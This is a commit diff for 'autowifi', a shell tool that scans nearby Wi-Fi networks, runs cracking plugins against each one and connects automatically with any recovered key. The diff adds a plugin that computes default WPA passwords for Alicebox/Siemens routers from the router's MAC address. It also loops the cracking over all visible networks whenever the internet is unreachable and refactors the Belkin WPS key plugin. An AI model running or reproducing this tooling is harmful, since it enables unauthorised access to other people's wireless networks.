summaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
-rwxr-xr-xusr/bin/autowifi19
-rwxr-xr-xusr/bin/autowifi_dryrun40
-rw-r--r--usr/lib/autowifi/lib/plugin_core26
-rwxr-xr-xusr/lib/autowifi/plugins/02alice20
-rwxr-xr-xusr/lib/autowifi/plugins/11belkin_wps9
5 files changed, 78 insertions, 36 deletions
diff --git a/usr/bin/autowifi b/usr/bin/autowifi
index 1969e650..5de46f41 100755
--- a/usr/bin/autowifi
+++ b/usr/bin/autowifi
@@ -114,6 +114,21 @@ loop_over_cracks(){
done
return 1
}
+loop_cracks_over_networks(){
+ wifi_init
+ for crack in $(find $crackdir -type f | sort -u); do
+ for i in `seq 1 $WIFI_COUNT`; do
+ KEY="$(eval root=$root \$crack \"\${ESSID_${i}}\" \"\${MAC_${i}}\" \${FREQ_${i}} \${ENCRYPTION_${i}})"
+ if [ $? -eq 0 ]; then
+ eval connect \"\${MAC_${i}}\" \"\${ESSID_${i}}\" \${ENCRYPTION_${i}} \"\${KEY}\"
+ if [ $? -eq 0 ]; then
+ return 0
+ fi
+ fi
+ done
+ done
+
+}
#scan_all(){
# for i in `seq 1 $WIFI_COUNT`; do
@@ -151,11 +166,11 @@ elif [ -n "$1" ]; then
connect_to_network_by_ssid "$1"
else
echo looping network now
- check_internet || loop_over_networks
+ check_internet || loop_cracks_over_networks
while sleep 60; do
if ! check_internet; then
- loop_over_networks
+ loop_cracks_over_networks
fi
done
fi
diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun
index 1df94119..8860b4a6 100755
--- a/usr/bin/autowifi_dryrun
+++ b/usr/bin/autowifi_dryrun
@@ -2,30 +2,23 @@
# ENV:
# the root directory (e.g. root=$PWD/../../ if run from here )
cd $(dirname $(readlink -f $0))
-root=${root:-/}
-wifi=${wifi:-wlan0}
-
test "${1:-}" = 'quiet' && exec 2>&-
-# for iwlist_scan
-. $root/usr/lib/autowifi/lib/iwlist
+interface=${interface:-wlan0}
+root=${root:-../../}
+crackdir=$root/usr/lib/autowifi/plugins
+wifi_keys=$root/etc/autowifi/wifi_keys
+wifi_log=$root/var/log/autowifi.log
-# . $ROOT/usr/lib/autowifi/lib/
+# exists() run_hooks()
+. $root/usr/lib/autowifi/lib/core
-# for check_internet and check_gateway
-# . /usr/lib/autowifi/lib/network
+# start_wpa_supplicant()
+. $root/usr/lib/autowifi/lib/wpa_supplicant
crack_wifi(){
- #SSID MAC CHANNEL ENCRYPTION WPA WPA2
- if [ "$4" == off ];then
- encr=open
- elif [ "$6" -eq 1 ]; then
- encr=psk2
- elif [ "$5" -eq 1 ]; then
- encr=psk
- elif [ "$4" == on ]; then
- encr=wep
- fi
+ #SSID MAC CHANNEL ENCRYPTION
+
ALL_RET=1
for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do
printf "%s" "Trying $(basename $hack) against $1 : " >&2
@@ -41,13 +34,18 @@ crack_wifi(){
done
return $ALL_RET
}
+wifi_init(){
+ wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant
+ wifi_scan > /tmp/${interface}.scan
+ . /tmp/${interface}.scan
+}
loop_over_networks(){
- . /tmp/${wifi}.scan
+ wifi_init
+
echo "SSID:MAC:CHANNEL:ENCRYPTION:key"
for i in `seq 1 $WIFI_COUNT`; do
- eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}}
+ eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}}
done
}
-iwlist_scan > /tmp/${wifi}.scan
loop_over_networks
diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core
index da003350..1b83b0c3 100644
--- a/usr/lib/autowifi/lib/plugin_core
+++ b/usr/lib/autowifi/lib/plugin_core
@@ -1,24 +1,38 @@
+#!/bin/sh
parse_plugin_args(){
[ $# -ne 4 ] && plugin_usage && exit 1
# convenience function to put args in ENV variables
ESSID="$1"
- MAC="$2"
+
+ # mac is returned without colon
+ MAC=$(printf "%s" "$2" | sed 's/://g')
+ # split up the mac address to vendor and private part
+ VENDOR_MAC=${MAC:0:6}
+ PRIVATE_MAC=${MAC:6:12}
CHANNEL="$3"
ENC="$4"
- if [ ${#MAC} -ne 17 ] ;then
+ if [ ${#MAC} -ne 12 ] ;then
echo "MAC malformed"
exit 1
fi
}
plugin_usage(){
cat << EOF
-usage: $0 ESSID MAC CHANNEL ENC WPA WPA2"
+usage: $0 ESSID MAC CHANNEL ENC"
ESSID - string
MAC - 00:11:22:33:44:55
- ENC - on | off
- WPA - 0 | 1
- WPA2 - 0 | 1
+ CHANNEL - 4
+ ENC - wpa
EOF
}
+
+check_vendor_mac(){
+ needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
+ shift
+ for i in "$@";do
+ [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
+ done
+ return 1
+}
diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice
new file mode 100755
index 00000000..1b4533a4
--- /dev/null
+++ b/usr/lib/autowifi/plugins/02alice
@@ -0,0 +1,20 @@
+#!/bin/sh
+# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
+# Based on Poc from
+# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
+#
+#
+# ESSID MAC CHANNEL ENCRYPTION
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
+
+# printf always makes string to lower, need that for correct md5sum
+ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
+TMP=$(printf $ETHMAC | md5sum)
+printf ${TMP:0:12} | base64
+exit 0
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 82140523..65e08624 100755
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0))
. ../lib/wps
parse_plugin_args "$@"
-MAC=$(printf "%s" $MAC| sed 's/://g')
-VENDOR_MAC=${MAC:0:6}
-PRIVATE_MAC=${MAC:6:12}
-if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
- echo "VENDOR MAC $VENDOR_MAC not affected"
- exit 1
-fi
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
calc_belkin(){
PRIVATE_MAC=${1}